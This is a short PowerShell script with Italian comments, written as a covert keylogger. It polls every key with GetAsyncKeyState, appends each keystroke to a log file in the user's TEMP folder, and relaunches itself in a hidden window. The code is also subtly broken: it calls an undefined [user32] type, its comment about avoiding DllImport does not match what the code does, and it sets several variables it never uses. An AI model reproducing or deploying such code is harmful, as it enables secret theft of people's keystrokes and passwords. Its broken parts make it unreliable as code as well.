$t = [Type]::GetType("System.Management.Automation.Utils")
$f = $t.GetField("helpHelpers", "NonPublic,Static")
$m = [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$k = {
    $api = [Type]::GetType("Microsoft.Win32.Win32Native")
    while($true) {
        for($i=8; $i -le 255; $i++) {
            # Uso della Reflection per invocare GetAsyncKeyState senza DllImport
            if([user32]::GetAsyncKeyState($i) -eq -32767) {
                $c = [char]$i
                "Premuto: $c" | Out-File "$env:TEMP\log.txt" -Append
            }
        }
        Start-Sleep -Milliseconds 100
    }
}
powershell -WindowStyle Hidden -Command $k